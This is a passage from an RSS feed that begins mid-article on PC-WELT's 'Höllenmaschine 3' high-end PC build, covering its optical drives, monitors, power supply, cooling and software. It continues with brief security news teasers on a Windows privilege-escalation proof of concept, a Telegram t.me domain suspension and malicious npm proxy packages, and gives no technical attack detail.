<p>Die Höllenmaschine 3 haben wir zudem mit einem Blu-Ray-Brenner bestückt. Der LG Electronics GGW-H20L beschreibt BD-Rs, BD-REs sowie sämtliche DVD-Rohlingstypen und liest alle gängigen Medien, darunter auch HD-DVDs. Der Pufferspeicher des internen 3,5-Zoll-Laufwerks beträgt 4 MB.</p>



<p>Bei maximalem 6-fachem Schreibtempo schaufelt der GGW-H20L bis zu 26,3 MB pro Sekunde über die SATA-Schnittstelle und füllt so einen einlagigen 25-GB-BR-Rohling in rund 15 Minuten. BD-REs beschreibt der Blu-Ray-Brenner mit 2‑facher Geschwindigkeit. Blu-Ray-Medien liest der LG Electronics GGW-H20L ebenfalls mit 6-fachem Tempo und HD-DVDs immerhin mit 3-facher Geschwindigkeit.</p>



<p>DVDs sowie CDs liest der Blu-Ray-Brenner mit maximal 16- beziehungsweise 40-facher Geschwindigkeit, DVD-RAMs mit 5-fachem Tempo. DVD±Rs beschreibt das Laufwerk mit 16-fachem, DVD-RWs mit 6fachem und DVD+RWs mit 8fachem Tempo. Dual-Layer- und Double-Layer-DVD+Rs brennt das interne Laufwerk mit 4-facher Geschwindigkeit, DVD-RAMs mit 5-fachem Tempo. CD-Rs sowie CD-RWs beschreibt der Blu-Ray-Brenner mit 40‑fachem respektive 24‑fachem Tempo.</p>



<p>Im Lieferumfang des Blu-Ray-Laufwerks enthalten sind die Programme Cyberlink Power DVD7, Cyberlink Power Producer 4 und Power 2Go. Hinzu kommt ein BD-RE-Rohling mit 25 GB Kapazität. Neben dem GGW-H20L haben wir als zweites optisches Laufwerk einen DVD-Brenner von Samsung eingebaut.</p>



<h2 class="wp-block-heading toc">TFTs: 30-Zoll-Breitbild und 7-Zoll-Touchscreen</h2>



<p>Für viel Übersicht sorgt das 30-Zoll-Breitbild-TFT Eizo SX3031W für knapp 2500 Euro, das wir der Höllenmaschine 3 zur Seite stellen. Die physikalische Auflösung des LCD-Bildschirms beträgt 2560 x 1600 Bildpunkte. Zudem kann der Eizo-Bildschirm gängige PC-Auflösungen im 4-zu-3-Bildformat wie 1600 x 1200, 1280 x 1024, 1024 x 768 und 800 x 600 Bildpunkte sauber skalieren.</p>



<p>Die Helligkeit des TFTs mit einer Bildschirmdiagonalen von 75,6 Zentimetern liegt nach Herstellerangaben bei 260 cd/m² und das Kontrastverhältnis bei 900:1. Den horizontalen und vertikalen Blickwinkel gibt Eizo mit jeweils 178 Grad an. Die Horizontalfrequenz liegt zwischen 31 und 100 kHz, die Vertikalfrequenz bewegt sich zwischen 59 und 61 Hz. Die Reaktionszeit gibt Eizo mit 6 Millisekunden an.</p>



<p>Der 30-Zoll-Breitbild-TFT misst 68,9 x 48,9 x 27,2 Zentimeter (B x H x T). Der SX3031W bringt mit Standfuß 15,3 Kilogramm auf die Waage. Anschluss an die Höllenmaschine 3 findet der Bildschirm über einen der beiden DVI-D-Buchsen, davon ist eine als Dual-Link und eine als HDCP-kompatible Single-Link ausgelegt.</p>



<p>Alternativ kann der Eizo-Bildschirm an beiden DVI-I-Eingängen jeweils Single-Link-Signale zweier PCs oder zweier Grafikkartenanschlüsse verarbeiten. In diesem Fall zeigt der 30-Zoll-Breitbild-TFT die beiden Bilder nebeneinander (Picture-by-Picture) und kann so als 21-Zoll-Zweischirmlösung fungieren. Hier finden Sie detaillierte Informationen zum <a href="https://www.eizo.com.cy/support/db/products/software/SX3031W.html" target="_blank" rel="noreferrer noopener">Eizo SX3031W</a>.</p>



<p>Mehr Flexibilität: Der 7-Zoll-TFT-Touchscreen ist für den Cube-Tower Mozart TX VE 1000BNS von Thermaltake konzipiert – die Gehäusebasis der Höllenmaschine 3. Dabei ist der Bildschirm in einem Laufwerkseinschub integriert und lässt sich in die Gehäusefront versenken. Die physikalische Auflösung des Touchscreens beträgt 1280 x 768 Bildpunkte. Die Stromversorgung des LCD-Bildschirm erfolgt über das Netzteil der Höllenmaschine 3. Mit im Lieferumfang des 7-Zoll-TFTs befindet sich eine Infrarot-Fernbedienung.</p>



<h2 class="wp-block-heading toc">Stromversorgung: 2000 Watt </h2>



<p>Keine Kompromisse machen wir bei der Stromversorgung und setzen das stärkste Netzteil ein, das wir bekommen konnten: das Thermaltake Toughpower 2000W, ein weiterer Prototyp, den es derzeit noch nicht zu kaufen gibt. Das 2000-Watt-Kraftpaket erfüllt mit ATX 12V 2.3 sowie EPS 2.92 die aktuellen Spezifikationen für Desktop- und Server-Netzteile.</p>



<p>Das Thermaltake Toughpower 2000W besitzt zwei voneinander unabhängige 12-Volt-Schienen, die jeweils bis zu 80 Ampere Stromstärke liefern und unsere beiden Quad-Core-Prozessoren jeweils über zwei vierpolige CPU-Stromstecker versorgen. Ebenfalls auf dem neuesten Stand der Technik sind die sechs 8-poligen (6 + 2) PCI-Express-Stromstecker.</p>



<h2 class="wp-block-heading toc">Kompressorkühlung</h2>



<p>Bei der recht hohen Leistungsaufnahme – die exakten Verbrauchswerte liefern wir noch nach – ist für den stabilen Betrieb der Höllenmaschine 3 eine effiziente Kühlung der hitzigsten Komponenten unverzichtbar. Diese Aufgabe übernimmt diesmal ein Kompressorkühlungssystem von Coolit Systems.</p>



<p>Die Prozessoren kühlt das Modell Freezone Elite, das bis zu 250 Watt Verlustleistung aufnehmen kann. Auch die beiden Grafikkarten und der Hauptplatinen-Chipsatz werden von speziell angepassten Kompressorkühlungssystemen unseres Kooperationspartners Coolit Systems gekühlt. Details erfahren Sie, sobald wir die Höllenmaschine 3 mit den Sonderanfertigungen aufgerüstet haben.</p>



<h2 class="wp-block-heading toc">Gehäuse-Unikat: Casemod für 6000 Euro</h2>



<p>Für die Gestaltung des Gehäuses konnte die PC-WELT wieder den Modding-Profi Heiko Polaczek engagieren. Der auch unter dem Alias „Fastbrain1“ bekannte Polaczek, ist seit 15 Jahren eine feste Größe in der internationalen Casemoding-Szene.</p>



<p>Ebenfalls eine Szenengröße konnten wir für die Bemalung der Höllenmaschine 3 in Airbrush-Technik gewinnen. Der Experte ist allerdings so bescheiden, dass wir derzeit nur seinen Spitznamen nennen dürfen: old_airbrush.</p>



<p>Die Höllenmaschine 3 ins rechte Licht gerückt hat der bekannte Fotograf Florian Schiller – er hat langjährige Erfahrung mit Divas.</p>



<p>Der Casemod „PC-WELT Höllenmaschine 3“ summiert sich mit Material und Arbeitsaufwand auf rund 6000 Euro. Wie Heiko Polaczek und old_airbrush aus dem Cube-Tower unser exklusives Schmuckstück geformt haben, erfahren Sie in Kürze auf PC-WELT.tv in der Beitragsreihe „Making of Höllenmaschine 3“.</p>



<h2 class="wp-block-heading toc">Software: Luxus-Paket für 5000 Euro</h2>



<p>Die Adobe Creative Suite 3 Master Collection für knapp 3500 Euro enthält folgende Anwendungen: Acrobat 8 Professional, After Effects CS3 Professional, Contribute CS3, Dreamweaver CS3, Encore CS3, Fireworks CS3, Flash CS3 Professional, Illustrator CS3, InDesign CS3, Photoshop CS3 Extended, Premiere Pro CS3 und Soundbooth CS3.</p>



<p>Mit im Lieferumfang der Adobe Creative Suite 3 Master Collection sind die Zusatzfunktionen und -techniken Acrobat Connect, Bridge CS3, Device Central CS3, Dynamic Link CS3, OnLocation CS3, Stock Photos, Version Cue CS3 und Ultra CS3.</p>



<p>Egal, ob Sie die Höllenmaschine 3 als Render-Workstation, High-End-Spielerechner oder Virtualsierungs-Server verwenden wollen, mit den installierten Betriebssystemen Microsoft Windows Server 2008 sowie Microsoft Windows Vista Ultimate stehen Ihnen zahlreiche Einsatzmöglichkeiten offen.</p>



<p>Und wer die Höllenmaschine 3 im Büroeinsatz unterfordern will, installiert das beiliegende Microsoft Office 2007 Professional. Das Software-Paket enthält die 2007er-Versionen von Access, Accounting Express, Excel, Outlook (mit Business Contact Manager), Powerpoint, Publisher und Word.</p>



<p>Nach der CeBIT beginnen wir unsere Tests mit den 64-Bit-Betriebssystemen Linux, Server 2008 und Vista.</p>



<p>Apropos: Ein perfekter Bedienkomfort gehört natürlich auch zu unserem 30.000-Euro-Luxusrechner. Dazu stellen wir Ihnen Eingabegeräte von Gyration zur Verfügung. Maus und Tastatur stammen aus der Optical Air Suite Go 2.4. Dazu kommt die Remote Suite des Media Center Go 2.4.</p>



<h2 class="wp-block-heading toc">So gewinnen Sie die HMX 6</h2>



<p>Auch dieses Jahr verlosen wir die Höllenmaschine unter allen Teilnehmern</p>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn" href="https://www.pcwelt.de/article/3179491/hmx-6-gewinnspiel.html" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Gewinnen Sie hier die HMX 6</a></div>


<h2 class="wp-block-heading toc">Wie Sie die HMX 6 verfolgen können</h2>



<p>In den kommenden Wochen folgen weitere Inhalte rund um die Höllenmaschine 6 auf <a href="https://www.youtube.com/playlist?list=PLVC_WMwVwvSiOOgt6D9mN4Ud71M_uLFsS">YouTube</a>, <a href="https://www.instagram.com/pcwelt/">Instagram</a>, <a href="https://www.tiktok.com/@pcwelt.de">TikTok</a>, <a href="https://www.facebook.com/pcwelt/reels/">Facebook </a>und natürlich auf <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">pcwelt.de</a>. Wenn Sie nichts verpassen wollen, sollten Sie den kostenlosen <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter abonnieren</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen. </p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New LegacyHive Windows 0-day Vulnerability Allows Users  to Load Another User’s Registry]]></title>
<description><![CDATA[A proof-of-concept exploit dubbed LegacyHive has been released, enabling a Windows elevation-of-privilege vulnerability in the Windows User Profile Service that allows a standard user to load another user’s registry hive under their own registry classes root. Registry hives are files that store c...]]></description>
<link>https://tsecurity.de/de/3669705/it-security-nachrichten/new-legacyhive-windows-0-day-vulnerability-allows-users-to-load-another-users-registry/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669705/it-security-nachrichten/new-legacyhive-windows-0-day-vulnerability-allows-users-to-load-another-users-registry/</guid>
<pubDate>Wed, 15 Jul 2026 08:08:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A proof-of-concept exploit dubbed LegacyHive has been released, enabling a Windows elevation-of-privilege vulnerability in the Windows User Profile Service that allows a standard user to load another user’s registry hive under their own registry classes root. Registry hives are files that store configuration data for Windows, services, applications, and user profiles. Improperly loading or exposing […]</p>
<p>The post <a href="https://cybersecuritynews.com/legacyhive-windows-0-day-vulnerability/">New LegacyHive Windows 0-day Vulnerability Allows Users  to Load Another User’s Registry</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China weist wiederholte Nutzung von „Cybersicherheit“ durch USA als Vorwand zur ...]]></title>
<description><![CDATA[... Cybersicherheit“ als Vorwand zur Diffamierung Chinas aus geopolitischen Gründen zu nutzen. Die chinesische Seite sei damit zutiefst unzufrieden ...]]></description>
<link>https://tsecurity.de/de/3669454/it-security-nachrichten/china-weist-wiederholte-nutzung-von-cybersicherheit-durch-usa-als-vorwand-zur/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669454/it-security-nachrichten/china-weist-wiederholte-nutzung-von-cybersicherheit-durch-usa-als-vorwand-zur/</guid>
<pubDate>Wed, 15 Jul 2026 05:08:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Cybersicherheit</b>“ als Vorwand zur Diffamierung Chinas aus geopolitischen Gründen zu nutzen. Die chinesische Seite sei damit zutiefst unzufrieden ...]]></content:encoded>
</item>
<item>
<title><![CDATA[O&O RegEditor - Komfortabler Editor für die Windows-Registry]]></title>
<description><![CDATA[Der O&O RegEditor 16.0 (Build 6656) ist eine kostenlose Alternative zum Registrierungs-Editor von Windows. Im Gegensatz zu diesem punktet das Tool unter anderem durch übersichtlichere Suchergebnisse, eine ...			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3668835/downloads/oo-regeditor-komfortabler-editor-fuer-die-windows-registry/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668835/downloads/oo-regeditor-komfortabler-editor-fuer-die-windows-registry/</guid>
<pubDate>Tue, 14 Jul 2026 20:08:16 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/downloadvorschalt,3970.html"><img hspace="5" border="0" align="left" alt="Registry, O&amp;O, O&amp;O RegEditor" width="660" height="371" src="https://i.wfcdn.de/teaser/660/27147.png"></a>
			Der O&amp;O RegEditor 16.0 (Build 6656) ist eine kostenlose Alternative zum Registrierungs-Editor von Windows. Im Gegensatz zu diesem punktet das Tool unter anderem durch übersichtlichere Suchergebnisse, eine ...			(<a href="https://winfuture.de/downloadvorschalt,3970.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-07-14 15h : 5 posts]]></title>
<description><![CDATA[5 posts were published in the last hour 12:32 : Telegram’s t.me Links Go Offline After Registry Places Domain on serverHold 12:32 : Cybercriminals Target Turkish Banks With 8,400 Phishing Domains and 6,600 Scam Ads 12:32 : What is Zero…
Read more →
The post IT Security News Hourly Summary 2026-07...]]></description>
<link>https://tsecurity.de/de/3668009/it-security-nachrichten/it-security-news-hourly-summary-2026-07-14-15h-5-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668009/it-security-nachrichten/it-security-news-hourly-summary-2026-07-14-15h-5-posts/</guid>
<pubDate>Tue, 14 Jul 2026 15:08:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>5 posts were published in the last hour 12:32 : Telegram’s t.me Links Go Offline After Registry Places Domain on serverHold 12:32 : Cybercriminals Target Turkish Banks With 8,400 Phishing Domains and 6,600 Scam Ads 12:32 : What is Zero…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-14-15h-5-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-14-15h-5-posts/">IT Security News Hourly Summary 2026-07-14 15h : 5 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Links Go Offline After Registry Places Domain on serverHold]]></title>
<description><![CDATA[Telegram’s t.me links stopped resolving after the .ME registry applied serverHold. The app still works, while the reason for the domain action remains unknown. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read…
Read more →
The post Telegram’s t.me L...]]></description>
<link>https://tsecurity.de/de/3667946/it-security-nachrichten/telegrams-tme-links-go-offline-after-registry-places-domain-on-serverhold/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667946/it-security-nachrichten/telegrams-tme-links-go-offline-after-registry-places-domain-on-serverhold/</guid>
<pubDate>Tue, 14 Jul 2026 14:41:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s t.me links stopped resolving after the .ME registry applied serverHold. The app still works, while the reason for the domain action remains unknown. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/telegrams-t-me-links-go-offline-after-registry-places-domain-on-serverhold/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/telegrams-t-me-links-go-offline-after-registry-places-domain-on-serverhold/">Telegram’s t.me Links Go Offline After Registry Places Domain on serverHold</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[148 getarnte npm-Pakete verwandeln Browser-Proxies in DDoS-Botnetze]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine neu analysierte npm-Kampagne nutzt 148 scheinbare Proxy-Tools als getarnte Botnet-Zellen: Jeder, der eine Proxy-Seite im Browser öffnet, gerät in den Datenstrom. Laut der Untersuchung bleibt die Schadlogik bewusst außerhalb des Install-Prozesses, um gängige Prüfmechani...]]></description>
<link>https://tsecurity.de/de/3667874/it-security-nachrichten/148-getarnte-npm-pakete-verwandeln-browser-proxies-in-ddos-botnetze/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667874/it-security-nachrichten/148-getarnte-npm-pakete-verwandeln-browser-proxies-in-ddos-botnetze/</guid>
<pubDate>Tue, 14 Jul 2026 14:08:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-npm-browser-proxy-ddos-botnet-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine neu analysierte npm-Kampagne nutzt 148 scheinbare Proxy-Tools als getarnte Botnet-Zellen: Jeder, der eine Proxy-Seite im Browser öffnet, gerät in den Datenstrom. Laut der Untersuchung bleibt die Schadlogik bewusst außerhalb des Install-Prozesses, um gängige Prüfmechanismen zur Build-Zeit zu umgehen. Stattdessen laden die Pakete zur Laufzeit Remote-Code über einen mutable CDN-Zweig und […]</p>
<div><a href="https://www.it-boltwise.de/148-getarnte-npm-pakete-verwandeln-browser-proxies-in-ddos-botnetze.html">... den vollständigen Artikel <strong>»148 getarnte npm-Pakete verwandeln Browser-Proxies in DDoS-Botnetze«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/148-getarnte-npm-pakete-verwandeln-browser-proxies-in-ddos-botnetze.html">148 getarnte npm-Pakete verwandeln Browser-Proxies in DDoS-Botnetze</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Links Go Offline After Registry Places Domain on serverHold]]></title>
<description><![CDATA[Telegram's t.me links stopped resolving after the .ME registry applied serverHold. The app still works, while the reason for the domain action remains unknown.]]></description>
<link>https://tsecurity.de/de/3667871/it-security-nachrichten/telegrams-tme-links-go-offline-after-registry-places-domain-on-serverhold/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667871/it-security-nachrichten/telegrams-tme-links-go-offline-after-registry-places-domain-on-serverhold/</guid>
<pubDate>Tue, 14 Jul 2026 14:08:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Telegram's t.me links stopped resolving after the .ME registry applied serverHold. The app still works, while the reason for the domain action remains unknown.]]></content:encoded>
</item>
<item>
<title><![CDATA[148 npm Packages Disguised as Student Proxies Turned Browsers Into a DDoS Botnet]]></title>
<description><![CDATA[A campaign of 148 npm packages disguised as student web proxies turned visitors' browsers into a distributed denial-of-service botnet for roughly two weeks in May, according to new research from JFrog.

The packages did not go after the developers who might install them. The operators used the re...]]></description>
<link>https://tsecurity.de/de/3667289/it-security-nachrichten/148-npm-packages-disguised-as-student-proxies-turned-browsers-into-a-ddos-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667289/it-security-nachrichten/148-npm-packages-disguised-as-student-proxies-turned-browsers-into-a-ddos-botnet/</guid>
<pubDate>Tue, 14 Jul 2026 10:24:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A campaign of 148 npm packages disguised as student web proxies turned visitors' browsers into a distributed denial-of-service botnet for roughly two weeks in May, according to new research from JFrog.

The packages did not go after the developers who might install them. The operators used the registry as free hosting for a booby-trapped proxy site and let the students who came to dodge]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me domain suspended at the registry level, breaking links worldwide]]></title>
<description><![CDATA[Telegram's t.me domain was temporarily placed on serverHold status at the registry level on Tuesday, causing all t.me links to stop resolving through the global Domain Name System (DNS). While the messaging platform itself remained operational, users were unable to access public channels, groups,...]]></description>
<link>https://tsecurity.de/de/3667223/it-security-nachrichten/telegrams-tme-domain-suspended-at-the-registry-level-breaking-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667223/it-security-nachrichten/telegrams-tme-domain-suspended-at-the-registry-level-breaking-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 09:52:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram's t.me domain was temporarily placed on serverHold status at the registry level on Tuesday, causing all t.me links to stop resolving through the global Domain Name System (DNS). While the messaging platform itself remained operational, users were unable to access public channels, groups, and profiles through the affected short links until Telegram switched to …</p>
<p>The post <a href="https://cyberinsider.com/telegrams-t-me-domain-suspended-at-the-registry-level-breaking-links-worldwide/">Telegram’s t.me domain suspended at the registry level, breaking links worldwide</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mobland Staffel 2: Ab dem 18. September bei Paramount+]]></title>
<description><![CDATA[Ab dem 18. September 2026 steht die zweite Staffel der Original-Serie Mobland bei Paramount+ bereit. In der Fortsetzung kehrt Tom Hardy als Vermittler („Fixer“) Harry da Souza zurück – an der Seite von Pierce Brosnan und Helen Mirren als Köpfe...Zum Beitrag: Mobland Staffel 2: Ab dem 18. Septembe...]]></description>
<link>https://tsecurity.de/de/3667189/it-nachrichten/mobland-staffel-2-ab-dem-18-september-bei-paramount/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667189/it-nachrichten/mobland-staffel-2-ab-dem-18-september-bei-paramount/</guid>
<pubDate>Tue, 14 Jul 2026 09:35:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ab dem 18. September 2026 steht die zweite Staffel der Original-Serie Mobland bei Paramount+ bereit. In der Fortsetzung kehrt Tom Hardy als Vermittler („Fixer“) Harry da Souza zurück – an der Seite von Pierce Brosnan und Helen Mirren als Köpfe...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/mobland-staffel-2-ab-dem-18-september-bei-paramount/">Mobland Staffel 2: Ab dem 18. September bei Paramount+</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram t.me Domain Suspension Breaks Invite and Message Links Worldwide]]></title>
<description><![CDATA[Telegram’s core t[.]me domain has been placed on server hold at the .me registry, a registry-level status that removes the domain from global DNS resolution and breaks every t[.]me short link worldwide. The disruption affects invite links, channel previews, and shared message URLs across all plat...]]></description>
<link>https://tsecurity.de/de/3666962/it-security-nachrichten/telegram-tme-domain-suspension-breaks-invite-and-message-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666962/it-security-nachrichten/telegram-tme-domain-suspension-breaks-invite-and-message-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 07:52:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s core t[.]me domain has been placed on server hold at the .me registry, a registry-level status that removes the domain from global DNS resolution and breaks every t[.]me short link worldwide. The disruption affects invite links, channel previews, and shared message URLs across all platforms, though Telegram’s primary app infrastructure appears unaffected. WHOIS records […]</p>
<p>The post <a href="https://cyberpress.org/telegram-t-me-domain-suspension/">Telegram t.me Domain Suspension Breaks Invite and Message Links Worldwide</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Domain Suspended, Breaking Invite and Channel Links Worldwide]]></title>
<description><![CDATA[Telegram’s core short-link domain, t.me, has been placed under a serverHold status at the .me registry. This action can remove the domain from the global DNS, making all associated links inaccessible. The incident affects various Telegram features, including invite links,…
Read more →
The post Te...]]></description>
<link>https://tsecurity.de/de/3666846/it-security-nachrichten/telegrams-tme-domain-suspended-breaking-invite-and-channel-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666846/it-security-nachrichten/telegrams-tme-domain-suspended-breaking-invite-and-channel-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 06:37:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s core short-link domain, t.me, has been placed under a serverHold status at the .me registry. This action can remove the domain from the global DNS, making all associated links inaccessible. The incident affects various Telegram features, including invite links,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/telegrams-t-me-domain-suspended-breaking-invite-and-channel-links-worldwide/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/telegrams-t-me-domain-suspended-breaking-invite-and-channel-links-worldwide/">Telegram’s t.me Domain Suspended, Breaking Invite and Channel Links Worldwide</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Domain Suspended, Breaking Invite and Channel Links Worldwide]]></title>
<description><![CDATA[Telegram’s core short-link domain, t.me, has been placed under a serverHold status at the .me registry. This action can remove the domain from the global DNS, making all associated links inaccessible. The incident affects various Telegram features, including invite links, public channel previews,...]]></description>
<link>https://tsecurity.de/de/3666835/it-security-nachrichten/telegrams-tme-domain-suspended-breaking-invite-and-channel-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666835/it-security-nachrichten/telegrams-tme-domain-suspended-breaking-invite-and-channel-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 06:22:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s core short-link domain, t.me, has been placed under a serverHold status at the .me registry. This action can remove the domain from the global DNS, making all associated links inaccessible. The incident affects various Telegram features, including invite links, public channel previews, bot URLs, usernames, and shared message links that rely on the t.me […]</p>
<p>The post <a href="https://gbhackers.com/telegrams-t-me-domain-suspended/">Telegram’s t.me Domain Suspended, Breaking Invite and Channel Links Worldwide</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Domain Suspended, ServerHold Status Breaks Links Worldwide]]></title>
<description><![CDATA[Telegram’s core t[.]me domain has been placed on serverHold at the .me registry, a registry-level status that removes the domain from the global DNS and breaks every t[.]me short link worldwide. WHOIS records confirm the domain now carries eight status…
Read more →
The post Telegram’s t.me Domain...]]></description>
<link>https://tsecurity.de/de/3666824/it-security-nachrichten/telegrams-tme-domain-suspended-serverhold-status-breaks-links-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666824/it-security-nachrichten/telegrams-tme-domain-suspended-serverhold-status-breaks-links-worldwide/</guid>
<pubDate>Tue, 14 Jul 2026 06:05:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Telegram’s core t[.]me domain has been placed on serverHold at the .me registry, a registry-level status that removes the domain from the global DNS and breaks every t[.]me short link worldwide. WHOIS records confirm the domain now carries eight status…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/telegrams-t-me-domain-suspended-serverhold-status-breaks-links-worldwide/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/telegrams-t-me-domain-suspended-serverhold-status-breaks-links-worldwide/">Telegram’s t.me Domain Suspended, ServerHold Status Breaks Links Worldwide</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Telegram’s t.me Domain Suspended, ServerHold Status Breaks Links Worldwide]]></title>
